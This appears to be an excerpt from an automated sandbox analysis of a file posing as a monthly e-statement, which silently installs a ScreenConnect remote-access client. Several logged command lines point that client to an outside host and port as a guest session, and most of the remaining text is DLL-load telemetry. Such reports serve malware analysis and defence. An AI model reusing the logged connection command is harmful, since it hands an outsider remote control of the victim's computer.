                  Source: C:\Users\user\Desktop\monthly-eStatementForum120478962.Client.exeCommand line argument: dfshim0_2_00F21000
                  Source: monthly-eStatementForum120478962.Client.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  Source: C:\Users\user\Desktop\monthly-eStatementForum120478962.Client.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                  Source: unknownProcess created: C:\Users\user\Desktop\monthly-eStatementForum120478962.Client.exe "C:\Users\user\Desktop\monthly-eStatementForum120478962.Client.exe"
                  Source: C:\Users\user\Desktop\monthly-eStatementForum120478962.Client.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe"
                  Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                  Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\system32\svchost.exe -k LocalService -s W32Time
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess created: C:\Users\user\AppData\Local\Apps\2.0\RH07BTXR.RY4\8448B9TM.6ZZ\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.WindowsClient.exe "C:\Users\user\AppData\Local\Apps\2.0\RH07BTXR.RY4\8448B9TM.6ZZ\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.WindowsClient.exe"
                  Source: C:\Users\user\AppData\Local\Apps\2.0\RH07BTXR.RY4\8448B9TM.6ZZ\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.WindowsClient.exeProcess created: C:\Users\user\AppData\Local\Apps\2.0\RH07BTXR.RY4\8448B9TM.6ZZ\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.ClientService.exe "C:\Users\user\AppData\Local\Apps\2.0\RH07BTXR.RY4\8448B9TM.6ZZ\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.ClientService.exe" "?e=Support&y=Guest&h=popwee2.zapto.org&p=8041&s=4b43e651-6d21-48a4-a5c8-8436b8ee48ae&k=BgIAAACkAABSU0ExAAgAAAEAAQCpDLJbB2UCJQST7J%2beAL4SRxBN9FnGDmzuSSe%2fjH%2bnKBeOQFHQ%2bCr3LypD1KSb17oRWP4zVHy7BT585yzIdtEsLOQJGVUwzeIFWaAKwKfBsHG%2fh8GYVt85W1oIVuD0heJmJtqEdcOjXvXPD4oJuQHoqhBbYLoSnsbfrTP0R040%2bcfkCNslvuf01cnsbcAeyUEFRKIz%2b8o0YJwrixE6vdRb5cxn%2bauV36m92%2b6%2fhNC5sRzM45Hr1FU47wA4rARa8OnACYafp32jE3t2Cm7EEkMt%2bS6HWKgaZMp0VLkBgPw3WnP85fhslYN9Uz3EZtsBn%2f97CFE2jSAv4%2brdgImA3na8&r=&i=Newboom%20Session" "1"
                  Source: unknownProcess created: C:\Users\user\AppData\Local\Apps\2.0\RH07BTXR.RY4\8448B9TM.6ZZ\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.ClientService.exe "C:\Users\user\AppData\Local\Apps\2.0\RH07BTXR.RY4\8448B9TM.6ZZ\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.ClientService.exe" "?e=Support&y=Guest&h=popwee2.zapto.org&p=8041&s=4b43e651-6d21-48a4-a5c8-8436b8ee48ae&k=BgIAAACkAABSU0ExAAgAAAEAAQCpDLJbB2UCJQST7J%2beAL4SRxBN9FnGDmzuSSe%2fjH%2bnKBeOQFHQ%2bCr3LypD1KSb17oRWP4zVHy7BT585yzIdtEsLOQJGVUwzeIFWaAKwKfBsHG%2fh8GYVt85W1oIVuD0heJmJtqEdcOjXvXPD4oJuQHoqhBbYLoSnsbfrTP0R040%2bcfkCNslvuf01cnsbcAeyUEFRKIz%2b8o0YJwrixE6vdRb5cxn%2bauV36m92%2b6%2fhNC5sRzM45Hr1FU47wA4rARa8OnACYafp32jE3t2Cm7EEkMt%2bS6HWKgaZMp0VLkBgPw3WnP85fhslYN9Uz3EZtsBn%2f97CFE2jSAv4%2brdgImA3na8&r=&i=Newboom%20Session" "1"
                  Source: C:\Users\user\AppData\Local\Apps\2.0\RH07BTXR.RY4\8448B9TM.6ZZ\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.ClientService.exeProcess created: C:\Users\user\AppData\Local\Apps\2.0\RH07BTXR.RY4\8448B9TM.6ZZ\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.WindowsClient.exe "C:\Users\user\AppData\Local\Apps\2.0\RH07BTXR.RY4\8448B9TM.6ZZ\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.WindowsClient.exe" "RunRole" "c62c9dea-32aa-435a-858b-87f989247e7c" "User"
                  Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k WerSvcGroup
                  Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 432 -p 7160 -ip 7160
                  Source: C:\Users\user\Desktop\monthly-eStatementForum120478962.Client.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7160 -s 332
                  Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
                  Source: C:\Users\user\Desktop\monthly-eStatementForum120478962.Client.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe"Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess created: C:\Users\user\AppData\Local\Apps\2.0\RH07BTXR.RY4\8448B9TM.6ZZ\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.WindowsClient.exe "C:\Users\user\AppData\Local\Apps\2.0\RH07BTXR.RY4\8448B9TM.6ZZ\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.WindowsClient.exe"Jump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\RH07BTXR.RY4\8448B9TM.6ZZ\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.WindowsClient.exeProcess created: C:\Users\user\AppData\Local\Apps\2.0\RH07BTXR.RY4\8448B9TM.6ZZ\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.ClientService.exe "C:\Users\user\AppData\Local\Apps\2.0\RH07BTXR.RY4\8448B9TM.6ZZ\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.ClientService.exe" "?e=Support&y=Guest&h=popwee2.zapto.org&p=8041&s=4b43e651-6d21-48a4-a5c8-8436b8ee48ae&k=BgIAAACkAABSU0ExAAgAAAEAAQCpDLJbB2UCJQST7J%2beAL4SRxBN9FnGDmzuSSe%2fjH%2bnKBeOQFHQ%2bCr3LypD1KSb17oRWP4zVHy7BT585yzIdtEsLOQJGVUwzeIFWaAKwKfBsHG%2fh8GYVt85W1oIVuD0heJmJtqEdcOjXvXPD4oJuQHoqhBbYLoSnsbfrTP0R040%2bcfkCNslvuf01cnsbcAeyUEFRKIz%2b8o0YJwrixE6vdRb5cxn%2bauV36m92%2b6%2fhNC5sRzM45Hr1FU47wA4rARa8OnACYafp32jE3t2Cm7EEkMt%2bS6HWKgaZMp0VLkBgPw3WnP85fhslYN9Uz3EZtsBn%2f97CFE2jSAv4%2brdgImA3na8&r=&i=Newboom%20Session" "1"Jump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\RH07BTXR.RY4\8448B9TM.6ZZ\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.ClientService.exeProcess created: C:\Users\user\AppData\Local\Apps\2.0\RH07BTXR.RY4\8448B9TM.6ZZ\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.WindowsClient.exe "C:\Users\user\AppData\Local\Apps\2.0\RH07BTXR.RY4\8448B9TM.6ZZ\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.WindowsClient.exe" "RunRole" "c62c9dea-32aa-435a-858b-87f989247e7c" "User"Jump to behavior
                  Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 432 -p 7160 -ip 7160
                  Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7160 -s 332
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess created: unknown unknown
                  Source: C:\Users\user\Desktop\monthly-eStatementForum120478962.Client.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Users\user\Desktop\monthly-eStatementForum120478962.Client.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Users\user\Desktop\monthly-eStatementForum120478962.Client.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Users\user\Desktop\monthly-eStatementForum120478962.Client.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Users\user\Desktop\monthly-eStatementForum120478962.Client.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Users\user\Desktop\monthly-eStatementForum120478962.Client.exeSection loaded: dfshim.dllJump to behavior
                  Source: C:\Users\user\Desktop\monthly-eStatementForum120478962.Client.exeSection loaded: version.dllJump to behavior
                  Source: C:\Users\user\Desktop\monthly-eStatementForum120478962.Client.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Users\user\Desktop\monthly-eStatementForum120478962.Client.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Users\user\Desktop\monthly-eStatementForum120478962.Client.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Users\user\Desktop\monthly-eStatementForum120478962.Client.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Users\user\Desktop\monthly-eStatementForum120478962.Client.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Users\user\Desktop\monthly-eStatementForum120478962.Client.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\Desktop\monthly-eStatementForum120478962.Client.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: sxs.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: dfshim.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: rasapi32.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: rasman.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: rtutils.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: mswsock.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: dhcpcsvc6.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: dhcpcsvc.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: wininet.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: dwrite.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: textshaping.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: windowscodecs.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: textinputframework.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: coreuicomponents.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: coremessaging.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: ntmarta.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: winnsi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: dnsapi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: rasadhlp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: fwpuclnt.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: secur32.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: schannel.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: mskeyprotect.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: ntasn1.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: ncrypt.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: ncryptsslp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: propsys.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: dpapi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: cryptnet.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: webio.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: cabinet.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: uiautomationcore.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: qmgr.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: bitsperf.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: xmllite.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: firewallapi.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: esent.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: umpdc.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: dnsapi.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: fwbase.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: ntmarta.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: flightsettings.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: netprofm.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: npmproxy.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: bitsigd.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: upnp.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: ssdpapi.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: appxdeploymentclient.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: wsmauto.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: miutils.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: wsmsvc.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: dsrole.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: pcwum.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: mi.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: wkscli.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: msv1_0.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: ntlmshared.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: cryptdll.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: webio.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: mswsock.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: winnsi.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: rasadhlp.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: fwpuclnt.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: rmclient.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: usermgrcli.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: execmodelclient.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: propsys.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: coremessaging.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: twinapi.appcore.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: execmodelproxy.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: resourcepolicyclient.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: vssapi.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: vsstrace.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: samcli.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: samlib.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: es.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: bitsproxy.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc6.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: schannel.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: mskeyprotect.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: ntasn1.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: ncrypt.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: ncryptsslp.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: dpapi.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: mpr.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: w32time.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: logoncli.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: umpdc.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: mswsock.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: dsrole.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: vmictimeprovider.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: dnsapi.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: rasadhlp.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: fwpuclnt.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\RH07BTXR.RY4\8448B9TM.6ZZ\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.WindowsClient.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\RH07BTXR.RY4\8448B9TM.6ZZ\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.WindowsClient.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\RH07BTXR.RY4\8448B9TM.6ZZ\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.WindowsClient.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\RH07BTXR.RY4\8448B9TM.6ZZ\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.WindowsClient.exeSection loaded: version.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\RH07BTXR.RY4\8448B9TM.6ZZ\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.WindowsClient.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\RH07BTXR.RY4\8448B9TM.6ZZ\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.WindowsClient.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\RH07BTXR.RY4\8448B9TM.6ZZ\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.WindowsClient.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\RH07BTXR.RY4\8448B9TM.6ZZ\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.WindowsClient.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\RH07BTXR.RY4\8448B9TM.6ZZ\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.WindowsClient.exeSection loaded: dfshim.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\RH07BTXR.RY4\8448B9TM.6ZZ\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.WindowsClient.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\RH07BTXR.RY4\8448B9TM.6ZZ\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.WindowsClient.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\RH07BTXR.RY4\8448B9TM.6ZZ\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.WindowsClient.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\RH07BTXR.RY4\8448B9TM.6ZZ\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.WindowsClient.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\RH07BTXR.RY4\8448B9TM.6ZZ\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.WindowsClient.exeSection loaded: windows.storage.dllJump to behavior
